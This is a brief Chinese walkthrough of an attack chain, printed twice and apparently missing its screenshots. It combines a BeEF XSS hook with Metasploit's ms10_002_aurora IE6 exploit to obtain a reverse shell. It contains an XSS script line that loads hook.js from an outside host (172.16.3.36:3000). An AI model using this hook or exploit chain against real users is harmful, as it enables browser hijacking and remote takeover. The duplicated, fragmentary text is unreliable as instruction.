本次beef结合msf 完成整个攻击过程
启动beef
beef

xss代码(beef生成):
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示:

xss执行

配置msf
payload
ms10_002_aurora (ie6 极光漏洞)
配置:

开始监听:

手动游览器执行:

(使用beef重定向到该url也可以)
上线:

反弹shell



 
本次beef结合msf 完成整个攻击过程
启动beef
beef

xss代码(beef生成):
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示:

xss执行

配置msf
payload
ms10_002_aurora (ie6 极光漏洞)
配置:

开始监听:

手动游览器执行:

(使用beef重定向到该url也可以)
上线:

反弹shell



很多往事